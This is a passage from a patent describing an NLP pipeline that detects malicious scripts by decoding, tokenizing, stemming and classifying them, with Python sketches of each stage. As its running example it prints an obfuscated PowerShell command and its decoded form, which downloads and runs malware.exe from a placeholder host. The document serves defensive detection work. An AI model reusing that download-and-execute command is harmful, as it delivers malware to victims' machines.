Referring to FIG. 3, an exemplary embodiment of an NLP pipeline 300 illustrating a sequence of operations performed by the enhanced malware detection system 110 is shown. According to this embodiment of the disclosure, the script text 115 may be command line text provided by the monitoring component 130 to the DAC component 135 or information received as input via a graphical user interface (GUI). As shown, the NLP pipeline 300 includes four (4) phases of operation; namely, (1) a data input phase 310 performed by the monitoring component 130 of FIG. 1; (2) a normalization phase 320 performed by the normalization logic 140 of FIG. 1; (3) a modeling phase 360 performed by the NLP-based modeling logic 160 of FIG. 1; and (4) a data output phase 380 performed by the reporting logic 165 of FIG. 1. Collectively, these phases are useful in identifying a cyberattack resulting from a user input rather than malware coming into the network as part of network traffic or an email message.

A. Data Input Phase

During the data input phase 310, the enhanced malware detection system 110 collects the incoming text associated with a script (i.e., script text 115). According to one embodiment of the disclosure, the script text 115 may be collected by either (i) monitoring active processes running a script and collecting the script text 115 during such monitoring or (ii) monitoring results collected by process tracker logic that is part of an operating system deployed within the network device 100 of FIG. 1 or the cybersecurity system 200 of FIG. 2. According to one embodiment of the disclosure, the monitoring operations conducted for collection of the script text 115 may be performed concurrently (i.e., overlapping at least a portion in time) with the execution of the script 112. An illustrative representation of the script text 115 associated with the script 112 (e.g., PowerShell), which is observed by the monitoring component 130, is shown as script representation (1) with an encoded portion italicized:

Script Representation (1): script text 305

- C:\\WINDOWS\\sysTEM32\\WInDOwspoWerSHElL\\V1.0\\POWERSHell.exe\″\″POWersheLL.EXE-EXeCuTIONpolicY BypASS-nopROFILe-wiNDoWSTyle hIDden-encodEdComMaND IChuRVctT0JqRWN01FNZc3RFbS5OZVQud2VCQ0xJRU50KS5kb3dubE9BZEZpTGUoIB0gIGh0dHA6Ly93d3cuYmFkd2Vic2l0ZXZmLmNvbS9tYWx3YXJlLmV4ZR0gICwgHSAkRU52OlRFTVBcb3V0dC5leGUdICApIDsgU3RBcnQgHSAkZW5WOnRFbXBcb3V0dC5leGUdIA==\

Upon collection, either the script text 115 or a portion of the script text 115 (hereinafter “script text 305”) is made available to the normalization logic 140. Herein, as shown, the script text 305 may be provided in the form of a command line text, which undergoes the normalization phase 320, resulting in the generation of normalized script text 355 for processing by the NLP model 365 or 370 during the NLP modeling phase 360.

B. Normalization Phase

The normalization phase 320 is conducted to (i) collect a portion of the script text 305, which includes collection of the non-encoded script text 315 and recovery of text that has been obfuscated through a prior encoding activity (hereinafter, “hidden script text 317”), and (ii) provide the normalized script text 355, filtered to remove text having little significance in the classification of the script 112, to the NLP modeling phase 360. Both the recovery of the hidden script text 317 and the generation of the normalized script text 355 increase the accuracy of the enhanced malware detection system 110 in classifying a detected script 112, namely by reducing the number and/or rate of false positives (FPs) and/or false negatives (FNs) that may occur during analysis of the script text 305. Furthermore, the normalization phase 320 is conducted to establish a robust vocabulary data store (e.g., at 155 of FIG. 1), expanded to include text (e.g., words, characters, etc.) having significant occurrences in the corpus of malicious scripts and/or benign scripts.

As shown, the normalization phase 320 includes the decode sub-phase 325, named entity recognition sub-phase 330, tokenization sub-phase 335, stemmer sub-phase 340, vocabulary construction sub-phase 345, and/or the text reconstruction sub-phase 350. The operations conducted during these sub-phases 325, 330, 335, 340, 345 and 350 are performed by the DAC component 135 represented in FIGS. 1-2, namely the decode logic 142, the named entity recognition logic 144, the tokenization logic 146, the stemmer logic 148, the vocabulary mapping logic 150, and the text reconstruction logic 152, respectively.

During the decode sub-phase 325, a first portion of the script text 305 (i.e., hidden script text 317), encoded to obfuscate a certain portion of the script 112, is decoded. More specifically, according to one embodiment of the disclosure, the encoding scheme utilized by the hidden script text 317 (e.g., Base64, Unicode Transformation Format “UTF”, etc.) may be determined from accessing a second (non-encoded) portion 315 of the script text 305, which is different from the hidden script text 317. For one embodiment of the disclosure, the second text portion 315 is mutually exclusive from the hidden script text 317. An illustrative representation of the decoded hidden script 317, being a Base64 decoded string with varying character and capitalization, may be represented by script representation (2) as shown below:

Script Representation (2): decoded hidden script 317

- nEW-OBjEct SYstEm.NeT.weBCLIENt).downlOAdFiLe(http://www.badwebsitevf.com/malware.exe, $ENv:TEMP\outt.exe); StArt $enV:tEmp\outt.exe

Based on this information, the hidden script text 317 is decoded to produce decoded text, which includes the decoded hidden script text 317 and the non-encoded portion of the script text 305 (collectively referred to as the “decoded script text 318”). An illustrative representation of the decoded text 318, shown below as script representation (3), is provided to the named entity recognition sub-phase 330 via path 328.

Script Representation (3): decoded script text 318

- C:\\WINDOWS\\sysTEM32\\WInDOwspoWerSHElL\\V1.0\\POWERSHell.exe\″\″POWersheLL.EXE-EXeCuTIONpolicY BypASS-nopROFILe-wiNDoWSTyle hIDden-encodEdComMaND nEW-OBjEct SYstEm.NeT.weBCLIENt).downlOAdFiLe(http://www.badwebsitevf.com/malware.exe, $ENv:TEMP\outt.exe); StArt $enV:tEmp\outt.exe\
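
By way of illustration only, the decode sub-phase 325 may be sketched as follows. The sketch assumes that the encoding scheme is signaled in the non-encoded portion by a PowerShell-style "-EncodedCommand" flag and that the hidden text is Base64 encoded. The function name decode_hidden_text, the regular expression, and the rule for choosing between UTF-16LE and UTF-8 are assumptions made for this example and are not taken from the disclosure.

```python
import base64
import binascii
import re

# Assumed signal: an "-EncodedCommand" flag (any capitalization) followed by a Base64 payload.
ENCODED_FLAG = re.compile(r"-encodedcommand\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_hidden_text(script_text: str) -> str:
    """Return script_text with the Base64 payload after -EncodedCommand decoded in place."""
    match = ENCODED_FLAG.search(script_text)
    if match is None:
        return script_text  # no encoded portion was found

    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except (binascii.Error, ValueError) as exc:
        # Mirrors the case where the encoding scheme cannot be determined.
        raise ValueError("encoding scheme could not be determined") from exc

    # Heuristic (assumption): NUL bytes suggest UTF-16LE text; otherwise treat as UTF-8.
    codec = "utf-16-le" if b"\x00" in raw else "utf-8"
    decoded = raw.decode(codec, errors="replace")

    # Splice the decoded text back between the untouched non-encoded portions.
    return script_text[: match.start(1)] + decoded + script_text[match.end(1):]
```

A caller would pass the collected command line text and forward the returned string to the named entity recognition sub-phase; a raised ValueError corresponds to halting the analysis and optionally issuing an alert.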

As shown in FIG. 3, during the named entity recognition sub-phase 330, the decoded script text 318 is analyzed to determine whether a name of a particular entity, such as a particular file name (e.g., POWersheLL.EXE, malware.exe), a particular source (e.g., domain name such as “badwebsitevf.com,” host address, etc.) or a particular target of the script (e.g., registry key, temporary file, etc.), is identified in the decoded script text 318. If so, the normalization logic 140 of FIG. 1 ensures that the name of the particular entity is maintained in the normalized script text 355 provided to the NLP modeling phase 360. As an illustrative example, a particular domain registry key may be targeted by ransomware, and thus, an attempted access to that registry key heightens the suspiciousness of the decoded script text 318. Likewise, a particular host address may identify a geographic location from which a number of cyberattacks have originated. Hence, the named entity recognition sub-phase 330 is used to assist the NLP modeling phase 360 in improving accuracy in the resulting classification of the script 112 as malicious or benign.

During the tokenization sub-phase 335, provided via path 332, the decoded script text 318 is segmented into smaller sized units (i.e., the plurality of “analytic tokens”) to produce segmented text 337 for subsequent analysis during the NLP modeling phase 360. The size of the analytic tokens may be preset or selected based on grid search techniques. For instance, a series of thresholds for the TF-IDF weighting may be defined (e.g., weights of 10%, 20%, . . . 90%), and a search may be conducted for the analytic token size parameter that yields the best ML prediction accuracy. Furthermore, for this embodiment of the disclosure, during the tokenization sub-phase 335, each of the analytic tokens forming the segmented text 337 and corresponding to the decoded hidden script text 317 is assigned a prefix (e.g., “PF_”). The prefix is provided to prioritize analysis of these tokens during the NLP modeling phase 360 as shown in script representation (4).

Script Representation (4): analytic tokens 337 with prefixes

- C:\\WINDOWS\\sysTEM32\\WInDOwspoWerSHElL\\V1.0\\POWERSHell.exe\″\″POWersheLL.EXE-EXeCuTIONpolicY BypASS-nopROFILe-wiNDoWSTyle hIDden-encodEdComMaND PF_nEW-OBjEct PF_SYstEm.NeT.weBCLIENt).downlOAdFiLe(PF_http://www.badwebsitevf.com/malware.exe, PF_$ENv:TEMP\outt.exe); PF_StArt $enV:tEmp\outt.exe\
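
As a non-limiting sketch, the prefixing performed during the tokenization sub-phase 335 may resemble the following. The token pattern (runs of letters, digits, "_", "$", "." and "-") and the function name tokenize are assumptions chosen for this example; the disclosure leaves the token size and delimiters to presets or grid search.

```python
import re

# Assumed token alphabet: word characters plus "$", "." and "-".
TOKEN_PATTERN = re.compile(r"[$\w.\-]+")
DECODED_PREFIX = "PF_"  # prefix named in the description


def tokenize(non_encoded: str, decoded_hidden: str) -> list[str]:
    """Segment both text portions; mark tokens recovered from the decoded portion."""
    plain_tokens = TOKEN_PATTERN.findall(non_encoded)
    hidden_tokens = [DECODED_PREFIX + tok for tok in TOKEN_PATTERN.findall(decoded_hidden)]
    return plain_tokens + hidden_tokens
```

Keeping the two portions separate until after prefixing allows a downstream model to treat a token recovered from obfuscated text differently from the same token appearing in plain view.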

In addition, during the stemmer sub-phase 340, the segmented text 337 (provided via path 338) undergoes operations to simplify its syntax. More specifically, during the stemmer sub-phase 340, the syntax of the segmented text 337 may be simplified by at least substituting a sequence of characters (e.g., a text string) for any multiple string patterns that represent the same argument in order to provide a uniform segmented text 342 via path 343. For example, with respect to script representation (4), multiple arguments with deviations in capitalization and/or spelling (e.g., “EXeCuTIONpolicY” as shown above, “ExecutionPolicy,” etc.) are uniformly referenced as the character “e,” as shown below. These operations of the stemmer sub-phase 340 broaden the degree of correlation between arguments to prevent malware authors from circumventing malware detection by renaming certain arguments within the script text 305.
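
One possible way to realize such a stemmer with a prefix tree is sketched below. The table PARAMETER_STEMS and the helper names build_trie and stem are hypothetical; the mapping of “executionpolicy” to “-e” follows the example above, while the remaining entries are assumptions. The sketch relies on the fact that a command line argument may be written as an abbreviation of its full name, so that any unambiguous prefix is mapped to the same stem.

```python
# Hypothetical table of full argument names and the uniform stem used for each.
PARAMETER_STEMS = {
    "executionpolicy": "-e",
    "noprofile": "-nop",
    "windowstyle": "-w",
    "encodedcommand": "-enc",
}


def build_trie(table: dict[str, str]) -> dict:
    """Build a prefix tree; every node records the stems reachable through it."""
    root: dict = {}
    for name, stem_value in table.items():
        node = root
        for ch in name:
            node = node.setdefault(ch, {})
            node.setdefault("stems", set()).add(stem_value)
    return root


def stem(token: str, trie: dict) -> str:
    """Lowercase the token and, if it is an unambiguous argument prefix, return its stem."""
    lowered = token.lower()
    if not lowered.startswith("-") or len(lowered) < 2:
        return lowered  # not an argument; only case is normalized
    node = trie
    for ch in lowered[1:]:
        node = node.get(ch)
        if node is None:
            return lowered  # unknown argument
    stems = node["stems"]
    return next(iter(stems)) if len(stems) == 1 else lowered


TRIE = build_trie(PARAMETER_STEMS)
```

With this table, “-EXeCuTIONpolicY”, “-ExecutionPolicy” and “-exec” all stem to “-e”, whereas an ambiguous or unknown argument is only lowercased.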

During the vocabulary construction sub-phase 345, a data store of significant text terms (i.e., selected characters or sequences of characters) is continuously updated, including storing certain wording from the uniform segmented text 342. Stated differently, language (an analytic token) is “insignificant” where the text pattern (e.g., word) is commonplace within the text and offers little value in distinguishing the analytic tokens, or is of a low frequency or a single instance so that any change to the language can be performed to easily circumvent the NLP analysis. Hence, the operation of the vocabulary construction sub-phase 345 is to develop a vocabulary data store that retains significant language for script analysis, where the significant language may be updated in response to a training session of the ML models operating with the NLP modeling phase 360.
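
A simplified sketch of such a vocabulary filter is given below. It substitutes plain document-frequency bounds for whatever significance measure an embodiment actually uses (e.g., TF-IDF); the function name build_vocabulary and the parameters min_docs and max_doc_ratio are assumptions introduced for this example.

```python
from collections import Counter


def build_vocabulary(corpus: list[list[str]], min_docs: int = 2,
                     max_doc_ratio: float = 0.9) -> set[str]:
    """Keep tokens that are neither too rare nor too commonplace across the corpus.

    corpus is a list of scripts, each given as a list of analytic tokens.
    """
    doc_freq: Counter = Counter()
    for tokens in corpus:
        doc_freq.update(set(tokens))  # count each token once per script

    n_docs = len(corpus)
    return {
        tok
        for tok, df in doc_freq.items()
        if df >= min_docs and df / n_docs <= max_doc_ratio
    }
```

Tokens seen in only one script are dropped because an attacker could trivially alter them, and tokens present in nearly every script are dropped because they do not help distinguish malicious scripts from benign scripts.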

The normalized script text 355 is formed during the text reconstruction sub-phase 350 in which portions of the decoded meta-information are removed or substituted with wording supplied by the vocabulary mapping logic 150. More specifically, the text reconstruction logic 152 reconstructs the uniform segmented text 342 using only text terms in the vocabulary data store, thereby producing a normalized script text 355 to be processed by the NLP model 162. In particular, the uniform segmented text 342 is filtered to remove language that is insignificant. An illustrative representation of the normalized script text 355 is the following, where the resultant script representation is much shorter in character (word) size than the first script representation, signifying that the resultant script representation has a better length and content for readily determining malware or benign content:

Script Representation (5): Normalized script text 355

- c windows system32 windowspowerv1.0 powershell.exe powershell.exe-e bypass-nop-w hidden-e PF_new-object PF_system.net.webclient PF_http PF_$env PF_temp PF_$env PF_temp
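
The filtering step of the text reconstruction may be sketched, under the assumption that the vocabulary data store is available as an in-memory set, as follows. The function name reconstruct is hypothetical.

```python
def reconstruct(uniform_tokens: list[str], vocabulary: set[str]) -> str:
    """Rebuild the script text from only those tokens found in the vocabulary."""
    return " ".join(tok for tok in uniform_tokens if tok in vocabulary)
```

Because token order is preserved, the normalized script text remains suitable for the sliding-window modeling applied in the subsequent phase.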

C. Modeling Phase

After formulation of the normalized script text 355, namely the plurality of analytic tokens, during the NLP modeling phase 360, an NLP model is applied to the normalized script text 355. During such application, depending on the type of machine learning operations being performed, a prediction score for the script is generated. The prediction score may be based, at least in part, on a collection of scores associated with a set of model-adapted tokens generated from the normalized script text 355 (e.g., based on the plurality of analytic tokens).

For example, the normalized script text 355, including the plurality of analytic tokens, may be processed by an NLP machine learning model 365. Herein, the normalized script text 355 undergoes N-gram or Skip-Gram modeling 366 (N≥1) which, using a sliding window, generates the set of model-adapted tokens 367, each corresponding to a single analytic token or to multiple (two or more) analytic tokens. For instance, when N=1, each analytic token is analyzed independently, while when N=2, two analytic tokens are analyzed collectively as a model-adapted token. Skip-Gram modeling may allow more flexibility in token combinations. For example, analytic tokens “A B C D,” using Skip-Gram modeling with (skip=1, N=2), produce analytic token combinations operating as model-adapted tokens (A B), (A C), (B C), (B D), and (C D). This flexibility increases the capability of detecting more sophisticated patterns, while also increasing the computational demands.
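
The sliding-window generation of model-adapted tokens may be illustrated by the following sketch. The function name skip_grams is an assumption; the window of N + skip tokens reproduces the “A B C D” example above.

```python
from itertools import combinations


def skip_grams(tokens: list[str], n: int = 2, skip: int = 0) -> list[tuple[str, ...]]:
    """Return ordered n-token combinations drawn from a sliding window of n + skip tokens.

    With skip=0 this reduces to ordinary N-grams (N=1 yields each token on its own).
    """
    grams = []
    for start in range(len(tokens)):
        # Candidates that may follow the anchor token inside the window.
        window = tokens[start + 1 : start + n + skip]
        for rest in combinations(window, n - 1):
            grams.append((tokens[start],) + rest)
    return grams


# Example from the description: skip=1, N=2 over "A B C D".
print(skip_grams(["A", "B", "C", "D"], n=2, skip=1))
# [('A', 'B'), ('A', 'C'), ('B', 'C'), ('B', 'D'), ('C', 'D')]
```

Increasing skip enlarges the window and therefore the number of combinations per anchor token, which is the source of the additional computational demand noted above.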

Thereafter, each of the set of model-adapted tokens 367 may undergo a weighting 368. The weighting 368 may be used to (i) increase the level of reliance on a token that is more demonstrative in accurately predicting a classification of a script as malicious or benign and (ii) decrease the level of reliance on a token that, historically, has had a lesser correlation with malicious or benign scripts.

Thereafter, each model-adapted token undergoes a classification 369 by determining, during modeling, whether the model-adapted token is correlated to any labeled malicious and/or benign tokens and assigning a weighted prediction score to that model-adapted token. A selected combination of some or all of these weighted prediction scores (e.g., an aggregate of the prediction scores) may signify a likelihood of maliciousness for the script. The likelihood of maliciousness is compared to one or more specified thresholds (e.g., a first threshold for malicious classification, a second threshold for benign classification, etc.).
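
For illustration, the weighting, aggregation and threshold comparison may be sketched as follows. The weighted average used as the aggregate, the threshold values, the neutral score returned when no token is recognized, and the function name classify are all assumptions; an embodiment may combine the scores differently.

```python
def classify(model_tokens, token_scores, token_weights,
             malicious_threshold=0.7, benign_threshold=0.3):
    """Aggregate per-token scores (0 = benign, 1 = malicious) into a script-level result."""
    weighted_sum = 0.0
    total_weight = 0.0
    for tok in model_tokens:
        if tok not in token_scores:
            continue  # token has no learned correlation; ignore it
        weight = token_weights.get(tok, 1.0)
        weighted_sum += weight * token_scores[tok]
        total_weight += weight

    # Assumption: with no recognized tokens, report a neutral score.
    score = weighted_sum / total_weight if total_weight else 0.5

    if score >= malicious_threshold:
        label = "malicious"
    elif score <= benign_threshold:
        label = "benign"
    else:
        label = "suspicious"  # non-determinative result
    return score, label
```

Using two thresholds leaves a middle band in which the result is treated as non-determinative rather than being forced into a malicious or benign classification.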

Alternatively, in lieu of conducting the modeling phase 360 using the NLP model 365 described above, the NLP modeling phase 360 may be performed by a neural network 370, such as an RNN 371 or a CNN 372 for example, which operates on an input based directly on the normalized script text 355. The operations of the neural network 370 are pre-trained (conditioned) using labeled training sets of tokens from malicious and/or benign scripts in order to identify text, especially within analytic tokens, that is probative of how the script should be classified. Communicatively coupled to and functioning in concert with the neural network 370 (e.g., CNN 372), a classifier 373, operating in accordance with a set of classification rules, receives an output from the CNN 372 and determines a classification assigned to the analytic tokens within the normalized script text 355 indicating whether the script associated with these analyzed tokens is malicious or benign.

Similar to operations of the ML model 365, a selected prediction score(s) produced by the classifier 373 (e.g., an aggregate of the prediction scores or a final prediction score) may signify a likelihood of maliciousness for the script. The likelihood of maliciousness is compared to one or more specified thresholds to determine a malicious classification or a benign classification. The usage of neural networks 370 during the NLP modeling phase 360 may be available where the enhanced malware detection system is located as part of a public or private cloud service, where substantially greater processing and memory capacity is available than in an agent deployment.

D. Data Output Phase

During the data output phase 380, upon receipt of a prediction score indicating that the script is malicious, an alert message 168 (e.g., email message, text message, automated phone call, dashboard (computer screen) notification, etc.) may be issued to an administrator identifying the cybersecurity threat. The alert message 168 may include the prediction score for the script along with a description that lists the rationale supporting the prediction score. The description may list the strong indicators (i.e., tokens) having demonstrative effect in classifying the script as malicious or benign. Furthermore, the description may list certain command arguments within the meta-information that are typical evasion techniques to run a process in the background and bypass execution policy, and thus are strong indicators of a cyberattack.
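
A minimal sketch of assembling such an alert is shown below, assuming that per-token contributions to the prediction score are available from the modeling phase. The dictionary layout, the parameter top_k and the function name build_alert are hypothetical and are not prescribed by the disclosure.

```python
def build_alert(script_text: str, prediction_score: float,
                token_contributions: dict[str, float], top_k: int = 3) -> dict:
    """Assemble alert content listing the most demonstrative tokens as the rationale."""
    ranked = sorted(token_contributions.items(), key=lambda item: item[1], reverse=True)
    indicators = [tok for tok, _ in ranked[:top_k]]
    return {
        "script": script_text,
        "classification": "malicious",
        "prediction_score": prediction_score,
        "description": "Strong indicators: " + ", ".join(indicators),
    }
```

The returned structure could then be rendered as an email message, a text message or a dashboard notification, depending on the deployment.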

Referring now to FIGS. 4A-4B, an illustrative embodiment of a flowchart outlining the operations conducted by the enhanced malware detection system of FIGS. 1-2 is shown. Upon receipt of the script for analysis, a determination is made whether a portion of text forming the script is encoded (item 400). If the script features no encoded text, the enhanced malware detection system performs tokenization of the script text as described below (item 405). However, if a portion of the script text is encoded, the enhanced malware detection system analyzes the script text and/or meta-information associated with the script to determine the encoding scheme used to encode the portion of the script (item 410). If the encoding scheme cannot be determined, the analysis of the script is halted, where an alert message may be generated to identify the script and a notification that the script is encoded as represented by the dashed lines (item 415). Execution of the script may be terminated as well to protect the network device. Alternatively, if the encoding scheme can be determined, the encoded text portion of the script is decoded so that the entire script is in a non-encoded format, referred to as “decoded script text” (item 420).

As shown in FIG. 4A, the decoded script text undergoes a tokenization operation to segment the decoded script text into analytic tokens for handling by the NLP model during the NLP modeling phase (item 425). Additionally, the decoded script text, namely the analytic tokens, undergoes a normalization operation to produce normalized script text. The normalization operation may include stemmer operations including alteration of the syntax of the decoded script text by substitution of at least one sequence of characters (i.e., one or more characters represented by one or more letters, numbers or symbols) with another (preferably shorter) sequence of characters. Additionally, or in the alternative, the normalization operation may include text reconstruction through removal of sequences of characters (e.g., words) absent from a vocabulary data store. The vocabulary data store includes content (e.g., characters, words, etc.) having significance in the classification of the script (item 430).

After generation of the normalized script text, as shown in FIG. 4B, one or more NLP models are applied to the normalized script text to produce a prediction score for tokens processed by the NLP model (item 435). The classification of the script may be determined based, at least in part, on the prediction score that represents the level of maliciousness of the script (item 440). According to one embodiment of the disclosure, the script may be determined as malicious based on a comparison of the prediction score (with any weighting applied) to a first threshold for malicious classification or a second threshold for benign classification, for example (item 445). If the script is determined to be malicious, a description directed to a justification for the malicious designation (e.g., listing of more demonstrative tokens or other factors) is automatically produced (item 450) and an alert message, including the script, classification for the script, and the description for example, is generated for transmission to an administrator (item 455). Otherwise, the analysis of the script concludes, where the benign or non-determinative (suspicious) result may or may not be provided to an administrator (item 460).

In the foregoing description, the invention is described with reference to specific exemplary embodiments thereof. It will, however, be evident that various modifications and changes may be made thereto without departing from the broader spirit and scope of the invention as set forth in the appended claims. For instance, the order of the above-identified operations and even the performance of some or all of the above-identified operations are not required for the invention unless explicitly claimed. Furthermore, other aspects of the invention can be practiced using other NLP processing and/or modeling techniques to analyze scripts and determine whether such scripts are part of a cyberattack.

Claims

1. A computerized method for detecting a cyberattack on a network device, the method comprising: receiving script text including a first plurality of characters; performing a normalization operation on the script text to produce a normalized script text having a second plurality of characters being less than the first plurality of characters, the normalized script text including a plurality of analytic tokens each being an instance of a sequence of characters grouped together as a useful semantic unit for natural language processing (NLP); applying, by modeling logic, a NLP model to the normalized script text to generate a set of tokens for use by a classifier, the classifier being configured to correlate the set of tokens with tokens associated with a corpus of at least known malicious scripts and classify a script associated with the script text as malicious or benign; and responsive to the script being classified as malicious, generating an alert message provided to an administrator to identify the malicious script.
2. The computerized method of claim 1, wherein the receiving of the script text comprises detecting a script running as a process on the network device and obtaining the script text from the script.
3. The computerized method of claim 1, wherein the performing of the normalization operation on the script text comprises determining whether at least a first portion of the script text is encoded; responsive to determining that the at least first portion of the script text is encoded, determining an encoding scheme used to encode the at least first portion of the script text; and upon determining the encoding scheme, decoding the at least first portion of the script text so that the script text undergoing the normalization operation features no encoded text.
4. The computerized method of claim 3, wherein the normalization operation on the script text comprises inserting a prefix before each analytic token of the plurality of analytic tokens corresponding to the decoded first portion of the script text, the prefix being a symbol signaling the NLP model to increase a scrutiny of analysis associated with each analytic token following the prefix.
5. The computerized method of claim 3, wherein the performing of the normalization operation on the script text further comprises performing a tokenization operation on the script text after decoding the at least first portion of the script text to produce the plurality of analytic tokens.
6. The computerized method of claim 5, wherein the performing of the normalization operation on the script text further comprises performing a stemmer operation on the plurality of analytic tokens of the script text to simplify a syntax associated with the plurality of analytic tokens, the stemmer operation being conducted in accordance with a prefix tree.
7. The computerized method of claim 6, wherein the performing of the normalization operation on the script text further comprises updating a vocabulary data store utilized during the normalization operation on the script text with one or more sequences of characters from the script text that arise to a predetermined level of significance for use in classification of the script, the predetermined level of significance being determined in accordance with a frequency of occurrence in the script text of the one or more sequences of characters.
8. The computerized method of claim 7, wherein the predetermined level of significance is determined in accordance with term frequency-inverse document frequency (tf-idf).
9. The computerized method of claim 7, wherein the performing of the normalization operation on the script text further comprises reconstructing the script text to produce the normalized script by at least removing one or more words from the script so that the plurality of analytic tokens include words only stored in the vocabulary data store.
10. The computerized method of claim 1, wherein the applying of the NLP model to the normalized script text includes generating the set of tokens corresponding to model-adapted tokens, from the plurality of analytic tokens, and applying the NLP model to the model-adapted tokens to produce a prediction score representing a level of maliciousness of the script.
11. The computerized method of claim 1, wherein the applying of the NLP model to the normalized script text includes analyzing each of the plurality of analytic tokens after normalization using a neural network trained using the tokens associated with the corpus of at least known malicious scripts being labeled training sets of malicious tokens in order to identify any of the plurality of analytic tokens probative in classifying the script and the classifier communicatively coupled to the neural network to classify the script in accordance with a set of classification rules.
12. A computerized method for detecting a cyberattack on a network device, the method comprising: receiving script text as input; performing, by normalization logic, a normalization operation on the script text to produce a normalized script text, the normalized script text including a plurality of analytic tokens each being an instance of a sequence of characters grouped together as a useful semantic unit for natural language processing (NLP); applying, by modeling logic, a NLP model to the normalized script text to generate a set of tokens; and classifying, by a classifier, a script associated with the script text as malicious or benign based on at least a correlation between the set of tokens and tokens associated with a corpus of known malicious scripts, wherein each of the normalization logic, the modeling logic and the classifier is software that is stored in one or more non-transitory storage mediums.
13. The computerized method of claim 12, wherein the performing of the normalization operation on the script text comprises determining whether at least a first portion of the script text is encoded; and responsive to determining that the at least first portion of the script text is encoded, determining an encoding scheme used to encode the at least first portion of the script text and decoding the at least first portion of the script text based on a decoding scheme to counter the encoding scheme.
14. The computerized method of claim 12, wherein the normalization operation on the script text comprises (i) decoding at least a first portion of the script text being encoded and (ii) inserting a prefix before each analytic token of the plurality of analytic tokens corresponding to the decoded first portion of the script text, the prefix being a symbol signaling the NLP model to increase a scrutiny of analysis associated with each analytic token following the prefix.
15. The computerized method of claim 12, wherein the performing of the normalization operation on the script text further comprises performing a tokenization operation on the script text after decoding any encoded portions of the script text to produce the plurality of analytic tokens.
16. The computerized method of claim 15, wherein the performing of the normalization operation on the script text further comprises performing a stemmer operation on the plurality of analytic tokens of the script text to simplify syntax associated with the plurality of analytic tokens, the stemmer operation being conducted in accordance with a prefix tree.
17. The computerized method of claim 15, wherein the receiving of the script includes receiving a shell script entered via a command line interface or graphical user interface.
18. A network device, comprising: one or more hardware processors; and a non-transitory storage medium communicatively coupled to the one or more hardware processors, the non-transitory storage medium comprises a software agent including a monitoring software component configured to detect a script and obtain script text associated with the script, an analysis software component configured to process the script text and generate a plurality of analytic tokens based on the script text, a modeling software component configured to generate a set of tokens based on the plurality of analytic tokens for use by a classifier to (i) correlate the set of tokens with tokens associated with a corpus of at least known malicious scripts and (ii) classify the script associated with the script text as malicious or benign, and reporting logic configured to generate an alert message provided to an administrator responsive to the script being classified as malicious.
19. The network device of claim 18, wherein the analysis software component, deployed as part of the software agent, upon execution by the one or more hardware processors, to perform a normalization operation on the script text to produce a normalized script text including a second plurality of characters being less than a first plurality of characters forming the script text, the normalized script text including the plurality of analytic tokens each being an instance of a sequence of characters grouped together as a useful semantic unit for natural language processing (NLP).
20. The network device of claim 19, wherein the modeling software component, deployed as part of the software agent, upon execution by the one or more hardware processors, to apply a NLP model to the normalized script text to classify the script.
21. The network device of claim 20, wherein the analysis software component, deployed as part of the software agent, upon execution by the one or more hardware processors, to perform the normalization operation by at least determining whether at least a first portion of the script text is encoded; responsive to determining that the at least first portion of the script text is encoded, determining an encoding scheme used to encode the at least first portion of the script text; and upon determining the encoding scheme, decoding the at least first portion of the script text so that the script text undergoing the normalization operation features no encoded text.
22. The network device of claim 21, wherein the analysis software component, deployed as part of the software agent, upon execution by the one or more hardware processors, to further perform the normalization operation by at least inserting a prefix before each analytic token of the plurality of analytic tokens corresponding to the decoded first portion of the script text, the prefix being a symbol signaling the NLP model to increase a scrutiny of analysis associated with each analytic token following the prefix.
23. The network device of claim 21, wherein the analysis software component, deployed as part of the software agent, upon execution by the one or more hardware processors, to perform the normalization operation that further comprises performing a tokenization operation on the script text after the decoding of the at least first portion of the script text to produce the plurality of analytic tokens.
24. The network device of claim 23, wherein the analysis software component, deployed as part of the software agent, upon execution by the one or more hardware processors, to perform the normalization operation that further comprises performing a stemmer operation on the plurality of analytic tokens of the script text to simplify a syntax associated with the plurality of analytic tokens, the stemmer operation being conducted in accordance with a prefix tree.
25. The network device of claim 24, wherein the analysis software component, deployed as part of the software agent, upon execution by the one or more hardware processors, to perform the normalization operation that further comprises updating a vocabulary data store utilized during the normalization operation on the script text with one or more sequences of characters from the script text that arise to a predetermined level of significance for use in classification of the script, the predetermined level of significance being determined in accordance with a frequency of occurrence in the script text of the one or more sequences of characters.
26. The network device of claim 25, wherein the analysis software component, deployed as part of the software agent, upon execution by the one or more hardware processors, to perform the normalization operation that further comprises reconstructing the script text to produce the normalized script by at least removing one or more words from the script so that the plurality of analytic tokens include words only stored in the vocabulary data store.
27. The network device of claim 20, wherein the modeling software component, deployed as part of the software agent, upon execution by the one or more hardware processors, applying the NLP model to the normalized script text to at least generate model-adapted tokens corresponding to the set of tokens, from the plurality of analytic tokens, and applying the NLP model to the model-adapted tokens to produce a prediction score representing a level of maliciousness of the script.
28. The network device of claim 20, wherein the modeling software component, deployed as part of the software agent, upon execution by the one or more hardware processors, applying of the NLP model to the normalized script text by at least analyzing each of the plurality of analytic tokens after normalization using a neural network trained using the tokens associated with the corpus of at least known malicious scripts corresponding to labeled training sets of malicious tokens in order to identify any of the plurality of analytic tokens probative in classifying the script and the classifier communicatively coupled to the neural network to classify the script in accordance with a set of classification rules.
29. A non-transitory storage medium including a software agent that, upon execution by one or more hardware processors, automatically detects a script and classifies the script as malicious or benign, comprising: a monitoring software component configured to detect a script and obtain script text associated with the script; an analysis software component configured to process the script text and generate a plurality of analytic tokens based on the script text; a modeling software component configured to generate a set of tokens based on the plurality of analytic tokens for use by a classifier to (i) correlate the set of tokens with tokens associated with a corpus of at least known malicious scripts and (ii) classify the script associated with the script text as malicious or benign; and a reporting software component configured to generate an alert message provided to an administrator responsive to the script being classified as malicious.
30. The computerized method of claim 1, wherein the classifier is further configured to correlate the set of tokens with tokens associated with a corpus of known benign scripts and the classifier to assign prediction scores to the set of tokens, the prediction scores collectively representing a likelihood of the script text being associated with a cyberattack.
31. The non-transitory storage medium of claim 29, wherein the analysis software component, deployed as part of the software agent, to perform a normalization operation on the script text to produce a normalized script text including a second plurality of characters being less than a first plurality of characters forming the script text, the normalized script text including the plurality of analytic tokens each being an instance of a sequence of characters grouped together as a useful semantic unit for natural language processing (NLP).
32. The non-transitory storage medium of claim 29, wherein the modeling software component, deployed as part of the software agent, to apply a NLP model to the normalized script text to classify the script.
